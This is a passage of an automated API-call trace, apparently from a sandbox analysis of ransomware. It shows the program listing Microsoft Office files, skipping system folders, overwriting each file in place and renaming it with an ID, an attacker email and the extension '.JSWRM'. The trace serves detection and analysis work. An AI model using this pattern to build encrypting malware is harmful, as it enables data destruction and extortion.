[0130.451] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKDECL.ICO", cAlternateFileName="")) returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2=".") returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="..") returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="...") returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="windows") returned -1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="recovery") returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="perflogs") returned 1 [0130.451] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="documents and settings") returned 1 [0130.452] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.452] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="system volume information") returned 1 [0130.452] lstrcmpiW (lpString1="TASKDECL.ICO", lpString2="msocache") returned 1 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDECL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDECL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.452] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.452] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.452] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.453] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.453] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.454] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.454] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.454] CloseHandle (hObject=0x314) returned 1 [0130.454] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.458] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKDECS.ICO", cAlternateFileName="")) returned 1 [0130.458] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2=".") returned 1 [0130.458] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="..") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="...") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="windows") returned -1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="recovery") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="perflogs") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="documents and settings") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="system volume information") returned 1 [0130.459] lstrcmpiW (lpString1="TASKDECS.ICO", lpString2="msocache") returned 1 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDECS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKDECS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKDECS.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.459] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecs.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.460] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0130.460] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.460] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0130.461] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.461] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0130.462] CloseHandle (hObject=0x314) returned 1 [0130.462] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecs.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKDECS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskdecs.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.463] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKL.ICO", cAlternateFileName="")) returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2=".") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="..") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="...") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="windows") returned -1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="recovery") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="perflogs") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="documents and settings") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="system volume information") returned 1 [0130.463] lstrcmpiW (lpString1="TASKL.ICO", lpString2="msocache") returned 1 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKL.ICO", cchWideChar=9, lpMultiByteStr=0x345e870, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKL.ICO", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKL.ICO", cchWideChar=9, lpMultiByteStr=0x345e840, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKL.ICO", lpUsedDefaultChar=0x0) returned 9 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.463] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.464] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.464] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.464] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.466] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.466] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.466] CloseHandle (hObject=0x314) returned 1 [0130.466] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.467] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4ae41a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x31d, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKREQ.CFG", cAlternateFileName="")) returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2=".") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="..") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="...") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="windows") returned -1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="recovery") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="perflogs") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="documents and settings") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="$RECYCLE.BIN") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="system volume information") returned 1 [0130.467] lstrcmpiW (lpString1="TASKREQ.CFG", lpString2="msocache") returned 1 [0130.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQ.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQ.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQ.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQ.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0130.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQ.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQ.CFG", lpUsedDefaultChar=0x0) returned 11 [0130.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.468] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreq.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.469] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=797) returned 1 [0130.469] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.469] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x310, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x310, lpOverlapped=0x0) returned 1 [0130.470] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.470] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x310, lpOverlapped=0x0) returned 1 [0130.471] CloseHandle (hObject=0x314) returned 1 [0130.471] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQ.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreq.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQ.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreq.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.472] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4ae41a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4d4679, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKREQL.ICO", cAlternateFileName="")) returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2=".") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="..") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="...") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="windows") returned -1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="recovery") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="perflogs") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="documents and settings") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="system volume information") returned 1 [0130.472] lstrcmpiW (lpString1="TASKREQL.ICO", lpString2="msocache") returned 1 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TASKREQL.ICO", lpUsedDefaultChar=0x0) returned 12 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.472] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.472] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreql.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0130.473] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0130.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.473] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0130.475] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.475] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0130.475] CloseHandle (hObject=0x314) returned 1 [0130.475] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreql.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\TASKREQL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\taskreql.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.476] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4d4679, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4d4679, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4fa8f4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="TASKREQS.ICO", cAlternateFileName="")) returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2=".") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="..") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="...") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="windows") returned -1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="recovery") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="perflogs") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="documents and settings") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="system volume information") returned 1 [0130.476] lstrcmpiW (lpString1="TASKREQS.ICO", lpString2="msocache") returned 1 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0130.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TASKREQS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, 